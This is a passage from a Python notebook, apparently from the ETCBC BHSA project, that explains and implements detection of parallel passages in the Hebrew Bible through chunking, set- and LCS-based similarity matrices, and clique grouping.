# $$ s_{\rm lcs}(C_1, C_2) = {\vert {\rm LCS}(C_1,C_2)\vert \over \vert C_1\vert + \vert C_2 \vert -
# \vert {\rm LCS}(C_1,C_2)\vert} $$
#
# where ${\rm LCS}(C_1, C_2)$ is the
# [longest common subsequence](https://en.wikipedia.org/wiki/Longest_common_subsequence_problem)
# of $C_1$ and $C_2$ and
# $\vert X\vert$ is the length of sequence $X$.
#
# It remains to be seen whether we need the extra sophistication of ``LCS``.
# The risk is that ``LCS`` could fail to spot related passages when there is a large amount of transposition going on.
# The results should have the last word.
#
# We need to compute the LCS efficiently, and for this we used the python ``Levenshtein`` module:
#
# ``pip install python-Levenshtein``
#
# whose documentation is
# [here](http://www.coli.uni-saarland.de/courses/LT1/2011/slides/Python-Levenshtein.html).
#
# ## 3.2 Performance
#
# Similarity computation is the part where the heavy lifting occurs.
# It is basically quadratic in the number of chunks, so if you have verses as chunks (~ 23,000),
# you need to do ~ 270,000,000 similarity computations, and if you use sentences (~ 64,000),
# you need to do ~ 2,000,000,000 ones!
# The computation of a single similarity should be *really* fast.
#
# Besides that, we use two ways to economize:
#
# * after having computed a matrix for a specific set of parameter values, we save the matrix to disk;
# new runs can load the matrix from disk in a matter of seconds;
# * we do not store low similarity values in the matrix, low being < ``MATRIX_THRESHOLD``.
#
# The ``LCS`` method is more complicated.
# We have tried the ``ratio`` method from the ``difflib`` package that is present in the standard python distribution.
# This is unbearably slow for our purposes.
# The ``ratio`` method in the ``Levenshtein`` package is much quicker.
#
# See the table for an indication of the amount of work to create the similarity matrix
# and the performance per similarity method.
#
# The *matrix threshold* is the lower bound of similarities that are stored in the matrix.
# If a pair of chunks has a lower similarity, no entry will be made in the matrix.
#
# The computing has been done on a Macbook Air (11", mid 2012, 1.7 GHz Intel Core i5, 8GB RAM).
#
# |chunk type |chunk size|similarity method|matrix threshold|# of comparisons|size of matrix (KB)|computing time (min)|
# |:----------|---------:|----------------:|---------------:|---------------:|------------------:|-------------------:|
# |fixed |100 |LCS |60 | 9,003,646| 7| ? |
# |fixed |100 |SET |50 | 9,003,646| 7| ? |
# |fixed |50 |LCS |60 | 36,197,286| 37| ? |
# |fixed |50 |SET |50 | 36,197,286| 18| ? |
# |fixed |20 |LCS |60 | 227,068,705| 2,400| ? |
# |fixed |20 |SET |50 | 227,068,705| 113| ? |
# |fixed |10 |LCS |60 | 909,020,841| 59,000| ? |
# |fixed |10 |SET |50 | 909,020,841| 1,800| ? |
# |object |verse |LCS |60 | 269,410,078| 2,300| 31|
# |object |verse |SET |50 | 269,410,078| 509| 14|
# |object |half_verse|LCS |60 | 1,016,396,241| 40,000| 50|
# |object |half_verse|SET |50 | 1,016,396,241| 3,600| 41|
# |object |sentence |LCS |60 | 2,055,975,750| 212,000| 68|
# |object |sentence |SET |50 | 2,055,975,750| 82,000| 63|
# # 4. Workflow
#
# ## 4.1 Chunking
#
# There are several ways to chunk the text:
#
# * fixed chunks of approximately ``CHUNK_SIZE`` words
# * by object, such as verse, sentence and even chapter
#
# After chunking, we prepare the chunks for similarity measuring.
#
# ### 4.1.1 Fixed chunking
# Fixed chunking is unnatural, but if the chunk size is small, it can yield fair results.
# The results are somewhat difficult to inspect, because they generally do not respect constituent boundaries.
# It is to be expected that fixed chunks in variant passages will be mutually *out of phase*,
# meaning that the chunks involved in these passages are not aligned with each other.
# So they will have a lower similarity than they could have if they were aligned.
# This is a source of artificial noise in the outcome and/or missed cases.
#
# If the chunking respects "natural" boundaries in the text, there is far less misalignment.
#
# ### 4.1.2 Object chunking
# We can also chunk by object, such as verse, half_verse or sentence.
#
# Chunking by *verse* is very much like chunking in fixed chunks of size 20, performance-wise.
#
# Chunking by *half_verse* is comparable to fixed chunks of size 10.
#
# Chunking by *sentence* will generate an enormous amount of
# false positives, because there are very many very short sentences (down to 1-word) in the text.
# Besides that, the performance overhead is huge.
#
# The *half_verses* seem to be a very interesting candidate.
# They are smaller than verses, but there are less *degenerate cases* compared to with sentences.
# From the table above it can be read that half verses require only half as many similarity computations as sentences.
#
#
# ## 4.2 Preparing
#
# We prepare the chunks for the application of the chosen method of similarity computation (``SET`` or ``LCS``).
#
# In both cases we reduce the text to a sequence of transliterated consonantal *lexemes* without disambiguation.
# In fact, we go one step further: we remove the consonants (aleph, wav, yod) that are often silent.
#
# For ``SET``, we represent each chunk as the set of its reduced lexemes.
#
# For ``LCS``, we represent each chunk as the string obtained by joining its reduced lexemes separated by white spaces.
#
# ## 4.3 Cliques
#
# After having computed a sufficient part of the similarity matrix, we set a value for ``SIMILARITY_THRESHOLD``.
# All pairs of chunks having at least that similarity are deemed *interesting*.
#
# We organize the members of such pairs in *cliques*, groups of chunks of which each member is
# similar (*similarity* > ``SIMILARITY_THRESHOLD``) to at least one other member.
#
# We start with no cliques and walk through the pairs whose similarity is above ``SIMILARITY_THRESHOLD``,
# and try to put each member into a clique.
#
# If there is not yet a clique, we make the member in question into a new singleton clique.
#
# If there are cliques, we find the cliques that have a member similar to the member in question.
# If we find several, we merge them all into one clique.
#
# If there is no such clique, we put the member in a new singleton clique.
#
# NB: Cliques may *drift*, meaning that they contain members that are completely different from each other.
# They are in the same clique, because there is a path of pairwise similar members leading from the one chunk to the other.
#
# ### 4.3.1 Organizing the cliques
# In order to handle cases where there are many corresponding verses in corresponding chapters, we produce
# chapter-by-chapter diffs in the following way.
#
# We make a list of all chapters that are involved in cliques.
# This yields a list of chapter cliques.
# For all *binary* chapters cliques, we generate a colorful diff rendering (as HTML) for the complete two chapters.
#
# We only do this for *promising* experiments.
#
# ### 4.3.2 Evaluating clique sets
#
# Not all clique sets are equally worth while.
# For example, if we set the ``SIMILARITY_THRESHOLD`` too low, we might get one gigantic clique, especially
# in combination with a fine-grained chunking. In other words: we suffer from *clique drifting*.
#
# We detect clique drifting by looking at the size of the largest clique.
# If that is large compared to the total number of chunks, we deem the results unsatisfactory.
#
# On the other hand, when the ``SIMILARITY_THRESHOLD`` is too high, you might miss a lot of correspondences,
# especially when chunks are large, or when we have fixed-size chunks that are out of phase.
#
# We deem the results of experiments based on a partitioning into fixed length chunks as unsatisfactory, although it
# might be interesting to inspect what exactly the damage is.
#
# At the moment, we have not yet analyzed the relative merits of the similarity methods ``SET`` and ``LCS``.
# # 5. Implementation
#
#
# The rest is code. From here we fire up the engines and start computing.
# In[8]:
PICKLE_PROTOCOL = 3
# # Setting up the context: source file and target directories
#
# The conversion is executed in an environment of directories, so that sources, temp files and
# results are in convenient places and do not have to be shifted around.
# In[5]:
# In[9]:
repoBase = os.path.expanduser("~/github/etcbc")
coreRepo = "{}/{}".format(repoBase, CORE_NAME)
thisRepo = "{}/{}".format(repoBase, NAME)
# In[10]:
coreTf = "{}/tf/{}".format(coreRepo, VERSION)
# In[11]:
allTemp = "{}/_temp".format(thisRepo)
thisTemp = "{}/_temp/{}".format(thisRepo, VERSION)
thisTempTf = "{}/tf".format(thisTemp)
# In[12]:
thisTf = "{}/tf/{}".format(thisRepo, VERSION)
thisNotes = "{}/shebanq/{}".format(thisRepo, VERSION)
# In[6]:
# In[13]:
notesFile = "crossrefNotes.csv"
if not os.path.exists(thisNotes):
os.makedirs(thisNotes)
# # Test
#
# Check whether this conversion is needed in the first place.
# Only when run as a script.
# In[7]:
# In[14]:
if SCRIPT:
(good, work) = utils.mustRun(
None, "{}/.tf/{}.tfx".format(thisTf, "crossref"), force=FORCE
)
if not good:
stop(good=False)
if not work:
stop(good=True)
# ## 5.1 Loading the feature data
#
# We load the features we need from the BHSA core database.
# In[8]:
# In[15]:
utils.caption(4, "Load the existing TF dataset")
TF = Fabric(locations=coreTf, modules=[""])
# In[9]:
# In[16]:
api = TF.load(
"""
otype
{} {} {}
book chapter verse number
""".format(
LEX_FEATURE,
TEXT_FEATURE,
TRAILER_FEATURE,
)
)
api.makeAvailableIn(globals())
# ## 5.2 Configuration
#
# Here are the parameters on which the results crucially depend.
#
# There are also parameters that control the reporting of the results, such as file locations.
# In[10]:
# In[17]:
# chunking
CHUNK_LABELS = {True: "fixed", False: "object"}
CHUNK_LBS = {True: "F", False: "O"}
CHUNK_SIZES = (100, 50, 20, 10)
CHUNK_OBJECTS = ("chapter", "verse", "half_verse", "sentence")
# In[18]:
# preparing
EXCLUDED_CONS = r"[>WJ=/\[]" # weed out weak consonants
EXCLUDED_PAT = re.compile(EXCLUDED_CONS)
# In[19]:
# similarity
MATRIX_THRESHOLD = 50
SIM_METHODS = ("SET", "LCS")
SIMILARITIES = (100, 95, 90, 85, 80, 75, 70, 65, 60, 55, 50, 45, 40, 35, 30)
# In[20]:
# printing
DEP_CLIQUE_RATIO = 25
DUB_CLIQUE_RATIO = 15
REC_CLIQUE_RATIO = 5
LARGE_CLIQUE_SIZE = 50
CLIQUES_PER_FILE = 50
# In[21]:
# assessing results
VALUE_LABELS = dict(
mis="no results available",
rec="promising results: recommended",
dep="messy results: deprecated",
dub="mixed quality: take care",
out="method deprecated",
nor="unassessed quality: inspection needed",
lr="this experiment is the last one run",
)
# note that the TF_TABLE and LOCAL_BASE_COMP are deliberately
# located in the version independent
# part of the tempdir.
# Here the results of expensive calculations are stored,
# to be used by all versions
# In[22]:
# crossrefs for TF
TF_TABLE = "{}/parallelTable.tsv".format(allTemp)
# In[23]:
# crossrefs for SHEBANQ
SHEBANQ_MATRIX = (False, "verse", "SET")
SHEBANQ_SIMILARITY = 65
SHEBANQ_TOOL = "parallel"
CROSSREF_STATUS = "!"
CROSSREF_KEYWORD = "crossref"
# In[24]:
# progress indication
VERBOSE = False
MEGA = 1000000
KILO = 1000
SIMILARITY_PROGRESS = 5 * MEGA
CLIQUES_PROGRESS = 1 * KILO
# In[25]:
# locations and hyperlinks
LOCAL_BASE_COMP = "{}/calculus".format(allTemp)
LOCAL_BASE_OUTP = "files"
EXPERIMENT_DIR = "experiments"
EXPERIMENT_FILE = "experiments"
EXPERIMENT_PATH = "{}/{}.txt".format(LOCAL_BASE_OUTP, EXPERIMENT_FILE)
EXPERIMENT_HTML = "{}/{}.html".format(LOCAL_BASE_OUTP, EXPERIMENT_FILE)
NOTES_FILE = "crossref"
NOTES_PATH = "{}/{}.csv".format(LOCAL_BASE_OUTP, NOTES_FILE)
STORED_CLIQUE_DIR = "stored/cliques"
STORED_MATRIX_DIR = "stored/matrices"
STORED_CHUNK_DIR = "stored/chunks"
CHAPTER_DIR = "chapters"
CROSSREF_DB_FILE = "crossrefdb.csv"
CROSSREF_DB_PATH = "{}/{}".format(LOCAL_BASE_OUTP, CROSSREF_DB_FILE)
# ## 5.3 Experiment settings
#
# For each experiment we have to adapt the configuration settings to the parameters that define the experiment.
# In[11]:
# In[26]:
def reset_params():
global CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT, CHUNK_LB, CHUNK_DESC
global SIMILARITY_METHOD, SIMILARITY_THRESHOLD, MATRIX_THRESHOLD
global meta
meta = collections.OrderedDict()
# chunking
CHUNK_FIXED = None # kind of chunking: fixed size or by object
CHUNK_SIZE = None # only relevant for CHUNK_FIXED = True
CHUNK_OBJECT = (
None # only relevant for CHUNK_FIXED = False; see CHUNK_OBJECTS in next cell
)
CHUNK_LB = None # computed from CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJ
CHUNK_DESC = None # computed from CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJ
# similarity
MATRIX_THRESHOLD = (
None # minimal similarity used to fill the matrix of similarities
)
SIMILARITY_METHOD = None # see SIM_METHODS in next cell
SIMILARITY_THRESHOLD = (
None # minimal similarity used to put elements together in cliques
)
meta = collections.OrderedDict()
# In[27]:
def set_matrix_threshold(sim_m=None, chunk_o=None):
global MATRIX_THRESHOLD
the_sim_m = SIMILARITY_METHOD if sim_m is None else sim_m
the_chunk_o = CHUNK_OBJECT if chunk_o is None else chunk_o
MATRIX_THRESHOLD = 50 if the_sim_m == "SET" else 60
if the_sim_m == "SET":
if the_chunk_o == "chapter":
MATRIX_THRESHOLD = 30
else:
MATRIX_THRESHOLD = 50
else:
if the_chunk_o == "chapter":
MATRIX_THRESHOLD = 55
else:
MATRIX_THRESHOLD = 60
# In[28]:
def do_params_chunk(chunk_f, chunk_i):
global CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT, CHUNK_LB, CHUNK_DESC
do_chunk = False
if (
chunk_f != CHUNK_FIXED
or (chunk_f and chunk_i != CHUNK_SIZE)
or (not chunk_f and chunk_i != CHUNK_OBJECT)
):
do_chunk = True
CHUNK_FIXED = chunk_f
if chunk_f:
CHUNK_SIZE = chunk_i
else:
CHUNK_OBJECT = chunk_i
CHUNK_LB = CHUNK_LBS[CHUNK_FIXED]
CHUNK_DESC = CHUNK_SIZE if CHUNK_FIXED else CHUNK_OBJECT
for p in (
"{}/{}".format(LOCAL_BASE_OUTP, EXPERIMENT_DIR),
"{}/{}".format(LOCAL_BASE_COMP, STORED_CHUNK_DIR),
):
if not os.path.exists(p):
os.makedirs(p)
return do_chunk
# In[29]:
def do_params(chunk_f, chunk_i, sim_m, sim_thr):
global CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT, CHUNK_LB, CHUNK_DESC
global SIMILARITY_METHOD, SIMILARITY_THRESHOLD, MATRIX_THRESHOLD
global meta
do_chunk = False
do_prep = False
do_sim = False
do_clique = False
meta = collections.OrderedDict()
if (
chunk_f != CHUNK_FIXED
or (chunk_f and chunk_i != CHUNK_SIZE)
or (not chunk_f and chunk_i != CHUNK_OBJECT)
):
do_chunk = True
do_prep = True
do_sim = True
do_clique = True
CHUNK_FIXED = chunk_f
if chunk_f:
CHUNK_SIZE = chunk_i
else:
CHUNK_OBJECT = chunk_i
if sim_m != SIMILARITY_METHOD:
do_prep = True
do_sim = True
do_clique = True
SIMILARITY_METHOD = sim_m
if sim_thr != SIMILARITY_THRESHOLD:
do_clique = True
SIMILARITY_THRESHOLD = sim_thr
set_matrix_threshold()
if SIMILARITY_THRESHOLD < MATRIX_THRESHOLD:
return (False, False, False, False, True)
CHUNK_LB = CHUNK_LBS[CHUNK_FIXED]
CHUNK_DESC = CHUNK_SIZE if CHUNK_FIXED else CHUNK_OBJECT
meta["CHUNK TYPE"] = (
"FIXED {}".format(CHUNK_SIZE)
if CHUNK_FIXED
else "OBJECT {}".format(CHUNK_OBJECT)
)
meta["MATRIX THRESHOLD"] = MATRIX_THRESHOLD
meta["SIMILARITY METHOD"] = SIMILARITY_METHOD
meta["SIMILARITY THRESHOLD"] = SIMILARITY_THRESHOLD
for p in (
"{}/{}".format(LOCAL_BASE_OUTP, EXPERIMENT_DIR),
"{}/{}".format(LOCAL_BASE_OUTP, CHAPTER_DIR),
"{}/{}".format(LOCAL_BASE_COMP, STORED_CLIQUE_DIR),
"{}/{}".format(LOCAL_BASE_COMP, STORED_MATRIX_DIR),
"{}/{}".format(LOCAL_BASE_COMP, STORED_CHUNK_DIR),
):
if not os.path.exists(p):
os.makedirs(p)
return (do_chunk, do_prep, do_sim, do_clique, False)
# In[30]:
reset_params()
# ## 5.4 Chunking
#
# We divide the text into chunks to be compared. The result is ``chunks``,
# which is a list of lists.
# Every chunk is a list of word nodes.
# In[12]:
# In[31]:
def chunking(do_chunk):
global chunks, book_rank
if not do_chunk:
TF.info(
"CHUNKING ({} {}): already chunked into {} chunks".format(
CHUNK_LB, CHUNK_DESC, len(chunks)
)
)
meta["# CHUNKS"] = len(chunks)
return
chunk_path = "{}/{}/chunk_{}_{}".format(
LOCAL_BASE_COMP,
STORED_CHUNK_DIR,
CHUNK_LB,
CHUNK_DESC,
)
if os.path.exists(chunk_path):
with open(chunk_path, "rb") as f:
chunks = pickle.load(f)
TF.info(
"CHUNKING ({} {}): Loaded: {:>5} chunks".format(
CHUNK_LB,
CHUNK_DESC,
len(chunks),
)
)
else:
TF.info("CHUNKING ({} {})".format(CHUNK_LB, CHUNK_DESC))
chunks = []
book_rank = {}
for b in F.otype.s("book"):
book_name = F.book.v(b)
book_rank[book_name] = b
words = L.d(b, otype="word")
nwords = len(words)
if CHUNK_FIXED:
nchunks = nwords // CHUNK_SIZE
if nchunks == 0:
nchunks = 1
common_incr = nwords
special_incr = 0
else:
rem = nwords % CHUNK_SIZE
common_incr = rem // nchunks
special_incr = rem % nchunks
word_in_chunk = -1
cur_chunk = -1
these_chunks = []
for w in words:
word_in_chunk += 1
if word_in_chunk == 0 or (
word_in_chunk
>= CHUNK_SIZE
+ common_incr
+ (1 if cur_chunk < special_incr else 0)
):
word_in_chunk = 0
these_chunks.append([])
cur_chunk += 1
these_chunks[-1].append(w)
else:
these_chunks = [
L.d(c, otype="word") for c in L.d(b, otype=CHUNK_OBJECT)
]
chunks.extend(these_chunks)
chunkvolume = sum(len(c) for c in these_chunks)
if VERBOSE:
TF.info(
"CHUNKING ({} {}): {:<20s} {:>5} words; {:>5} chunks; sizes {:>5} to {:>5}; {:>5}".format(
CHUNK_LB,
CHUNK_DESC,
book_name,
nwords,
len(these_chunks),
min(len(c) for c in these_chunks),
max(len(c) for c in these_chunks),
"OK" if chunkvolume == nwords else "ERROR",
)
)
with open(chunk_path, "wb") as f:
pickle.dump(chunks, f, protocol=PICKLE_PROTOCOL)
TF.info("CHUNKING ({} {}): Made {} chunks".format(CHUNK_LB, CHUNK_DESC, len(chunks)))
meta["# CHUNKS"] = len(chunks)
# ## 5.5 Preparing
#
# In order to compute similarities between chunks, we have to compile each chunk into the information that really matters for the comparison. This is dependent on the chosen method of similarity computing.
#
# ### 5.5.1 Preparing for SET comparison
#
# We reduce words to their lexemes (dictionary entries) and from them we also remove the aleph, wav, and yods.
# The lexeme feature also contains characters (`/ [ =`) to disambiguate homonyms. We also remove these.
# If we end up with something empty, we skip it.
# Eventually, we take the set of these reduced word lexemes, so that we effectively ignore order and multiplicity of words. In other words: the resulting similarity will be based on lexeme content.
#
# ### 5.5.2 Preparing for LCS comparison
#
# Again, we reduce words to their lexemes as for the SET preparation, and we do the same weeding of consonants and empty strings. But then we concatenate everything, separated by a space. So we preserve order and multiplicity.
# In[13]:
# In[32]:
def preparing(do_prepare):
global chunk_data
if not do_prepare:
TF.info(
"PREPARING ({} {} {}): Already prepared".format(
CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD
)
)
return
TF.info("PREPARING ({} {} {})".format(CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD))
chunk_data = []
if SIMILARITY_METHOD == "SET":
for c in chunks:
words = (
EXCLUDED_PAT.sub("", Fs(LEX_FEATURE).v(w).replace("<", "O")) for w in c
)
clean_words = (w for w in words if w != "")
this_data = frozenset(clean_words)
chunk_data.append(this_data)
else:
for c in chunks:
words = (
EXCLUDED_PAT.sub("", Fs(LEX_FEATURE).v(w).replace("<", "O")) for w in c
)
clean_words = (w for w in words if w != "")
this_data = " ".join(clean_words)
chunk_data.append(this_data)
TF.info(
"PREPARING ({} {} {}): Done {} chunks.".format(
CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD, len(chunk_data)
)
)
# ## 5.6 Similarity computation
#
# Here we implement our two ways of similarity computation.
# Both need a massive amount of work, especially for experiments with many small chunks.
# The similarities are stored in a ``matrix``, a data structure that stores a similarity number for each pair of chunk indexes.
# Most pair of chunks will be dissimilar. In order to save space, we do not store similarities below a certain threshold.
# We store matrices for re-use.
#
# ### 5.6.1 SET similarity
# The core is an operation on the sets, associated with the chunks by the prepare step. We take the cardinality of the intersection divided by the cardinality of the union.
# Intuitively, we compute the proportion of what two chunks have in common against their total material.
#
# In case the union is empty (both chunks have yielded an empty set), we deem the chunks not to be interesting as a parallel pair, and we set the similarity to 0.
#
# ### 5.6.2 LCS similarity
# The core is the method `ratio()`, taken from the Levenshtein module.
# Remember that the preparation step yielded a space separated string of lexemes, and these strings are compared on the basis of edit distance.
# In[14]:
# In[33]:
def similarity_post():
nequals = len({x for x in chunk_dist if chunk_dist[x] >= 100})
cmin = min(chunk_dist.values()) if len(chunk_dist) else "!empty set!"
cmax = max(chunk_dist.values()) if len(chunk_dist) else "!empty set!"
meta["LOWEST AVAILABLE SIMILARITY"] = cmin
meta["HIGHEST AVAILABLE SIMILARITY"] = cmax
meta["# EQUAL COMPARISONS"] = nequals
TF.info(
"SIMILARITY ({} {} {} M>{}): similarities between {} and {}. {} are 100%".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
cmin,
cmax,
nequals,
)
)
# In[34]:
def similarity(do_sim):
global chunk_dist
total_chunks = len(chunks)
total_distances = total_chunks * (total_chunks - 1) // 2
meta["# SIMILARITY COMPARISONS"] = total_distances
SIMILARITY_PROGRESS = total_distances // 100
if SIMILARITY_PROGRESS >= MEGA:
sim_unit = MEGA
sim_lb = "M"
else:
sim_unit = KILO
sim_lb = "K"
if not do_sim:
TF.info(
"SIMILARITY ({} {} {} M>{}): Using {:>5} {} ({}) comparisons with {} entries in matrix".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
total_distances // sim_unit,
sim_lb,
total_distances,
len(chunk_dist),
)
)
meta["# STORED SIMILARITIES"] = len(chunk_dist)
similarity_post()
return
matrix_path = "{}/{}/matrix_{}_{}_{}_{}".format(
LOCAL_BASE_COMP,
STORED_MATRIX_DIR,
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
)
if os.path.exists(matrix_path):
with open(matrix_path, "rb") as f:
chunk_dist = pickle.load(f)
TF.info(
"SIMILARITY ({} {} {} M>{}): Loaded: {:>5} {} ({}) comparisons with {} entries in matrix".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
total_distances // sim_unit,
sim_lb,
total_distances,
len(chunk_dist),
)
)
meta["# STORED SIMILARITIES"] = len(chunk_dist)
similarity_post()
return
TF.info(
"SIMILARITY ({} {} {} M>{}): Computing {:>5} {} ({}) comparisons and saving entries in matrix".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
total_distances // sim_unit,
sim_lb,
total_distances,
)
)
chunk_dist = {}
wc = 0
wt = 0
if SIMILARITY_METHOD == "SET":
# method SET: all chunks have been reduced to sets, ratio between lengths of intersection and union
for i in range(total_chunks):
c_i = chunk_data[i]
for j in range(i + 1, total_chunks):
c_j = chunk_data[j]
u = len(c_i | c_j)
# HERE COMES THE SIMILARITY COMPUTATION
d = 100 * len(c_i & c_j) / u if u != 0 else 0
# HERE WE STORE THE OUTCOME
if d >= MATRIX_THRESHOLD:
chunk_dist[(i, j)] = d
wc += 1
wt += 1
if wc == SIMILARITY_PROGRESS:
wc = 0
TF.info(
"SIMILARITY ({} {} {} M>{}): Computed {:>5} {} comparisons and saved {} entries in matrix".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
wt // sim_unit,
sim_lb,
len(chunk_dist),
)
)
elif SIMILARITY_METHOD == "LCS":
# method LCS: chunks are sequence aligned, ratio between length of all common parts and total length
for i in range(total_chunks):
c_i = chunk_data[i]
for j in range(i + 1, total_chunks):
c_j = chunk_data[j]
# HERE COMES THE SIMILARITY COMPUTATION
d = 100 * ratio(c_i, c_j)
# HERE WE STORE THE OUTCOME
if d >= MATRIX_THRESHOLD:
chunk_dist[(i, j)] = d
wc += 1
wt += 1
if wc == SIMILARITY_PROGRESS:
wc = 0
TF.info(
"SIMILARITY ({} {} {} M>{}): Computed {:>5} {} comparisons and saved {} entries in matrix".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
wt // sim_unit,
sim_lb,
len(chunk_dist),
)
)
with open(matrix_path, "wb") as f:
pickle.dump(chunk_dist, f, protocol=PICKLE_PROTOCOL)
TF.info(
"SIMILARITY ({} {} {} M>{}): Computed {:>5} {} ({}) comparisons and saved {} entries in matrix".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
wt // sim_unit,
sim_lb,
wt,
len(chunk_dist),
)
)
meta["# STORED SIMILARITIES"] = len(chunk_dist)
similarity_post()
# ## 5.7 Cliques
#
# Based on the value for the ``SIMILARITY_THRESHOLD`` we use the similarity matrix to pick the *interesting*
# similar pairs out of it. From these pairs we lump together our cliques.
#
# Our list of experiments will select various values for ``SIMILARITY_THRESHOLD``, which will result
# in various types of clique behavior.
#
# We store computed cliques for re-use.
#
# ## 5.7.1 Selecting passages
#
# We take all pairs from the similarity matrix which are above the threshold, and add both members to a list of passages.
#
# ## 5.7.2 Growing cliques
# We inspect all passages in our set, and try to add them to the cliques we are growing.
# We start with an empty set of cliques.
# Each passage is added to a clique with which it has *enough familiarity*, otherwise it is added to a new clique.
# *Enough familiarity means*: the passage is similar to at least one member of the clique, and the similarity is at least ``SIMILARITY_THRESHOLD``.
# It is possible that a passage is thus added to more than one clique. In that case, those cliques are merged.
# This may lead to growing very large cliques if ``SIMILARITY_THRESHOLD`` is too low.
# In[15]:
# In[35]:
def key_chunk(i):
c = chunks[i]
w = c[0]
return (
-len(c),
L.u(w, otype="book")[0],
L.u(w, otype="chapter")[0],
L.u(w, otype="verse")[0],
)
# In[36]:
def meta_clique_pre():
global similars, passages
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): inspecting the similarity matrix".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
)
similars = {x for x in chunk_dist if chunk_dist[x] >= SIMILARITY_THRESHOLD}
passage_set = set()
for (i, j) in similars:
passage_set.add(i)
passage_set.add(j)
passages = sorted(passage_set, key=key_chunk)
meta["# SIMILAR COMPARISONS"] = len(similars)
meta["# SIMILAR PASSAGES"] = len(passages)
# In[37]:
def meta_clique_pre2():
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): {} relevant similarities between {} passages".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(similars),
len(passages),
)
)
# In[38]:
def meta_clique_post():
global l_c_l
meta["# CLIQUES"] = len(cliques)
scliques = collections.Counter()
for c in cliques:
scliques[len(c)] += 1
l_c_l = max(scliques.keys()) if len(scliques) > 0 else 0
totmn = 0
totcn = 0
for (ln, n) in sorted(scliques.items(), key=lambda x: x[0]):
totmn += ln * n
totcn += n
if VERBOSE:
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): {:>4} cliques of length {:>4}".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
n,
ln,
)
)
meta["# CLIQUES of LENGTH {:>4}".format(ln)] = n
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): {} members in {} cliques".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
totmn,
totcn,
)
)
# In[39]:
def cliqueing(do_clique):
global cliques
if not do_clique:
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): Already loaded {} cliques out of {} candidates from {} comparisons".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(cliques),
len(passages),
len(similars),
)
)
meta_clique_pre2()
meta_clique_post()
return
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): fetching similars and chunk candidates".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
)
meta_clique_pre()
meta_clique_pre2()
clique_path = "{}/{}/clique_{}_{}_{}_{}_{}".format(
LOCAL_BASE_COMP,
STORED_CLIQUE_DIR,
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
)
if os.path.exists(clique_path):
with open(clique_path, "rb") as f:
cliques = pickle.load(f)
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): Loaded: {:>5} cliques out of {:>6} chunks from {} comparisons".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(cliques),
len(passages),
len(similars),
)
)
meta_clique_post()
return
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): Composing cliques out of {:>6} chunks from {} comparisons".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(passages),
len(similars),
)
)
cliques_unsorted = []
np = 0
npc = 0
for i in passages:
added = None
removable = set()
for (k, c) in enumerate(cliques_unsorted):
origc = tuple(c)
for j in origc:
d = (
chunk_dist.get((i, j), 0)
if i < j
else chunk_dist.get((j, i), 0)
if j < i
else 0
)
if d >= SIMILARITY_THRESHOLD:
if (
added is None
): # the passage has not been added to any clique yet
c.add(i)
added = k # remember that we added the passage to this clique
else: # the passage has alreay been added to another clique:
# we merge this clique with that one
cliques_unsorted[added] |= c
removable.add(
k
) # we remember that we have merged this clicque into another one,
# so we can throw away this clicque later
break
if added is None:
cliques_unsorted.append({i})
else:
if len(removable):
cliques_unsorted = [
c for (k, c) in enumerate(cliques_unsorted) if k not in removable
]
np += 1
npc += 1
if npc == CLIQUES_PROGRESS:
npc = 0
TF.info(
"CLIQUES ({} {} {} M>{} S>{}): Composed {:>5} cliques out of {:>6} chunks".format(
CHUNK_LB,
CHUNK_DESC,
SIMILARITY_METHOD,
MATRIX_THRESHOLD,
SIMILARITY_THRESHOLD,
len(cliques_unsorted),
np,
)
)
cliques = sorted([tuple(sorted(c, key=key_chunk)) for c in cliques_unsorted])
with open(clique_path, "wb") as f:
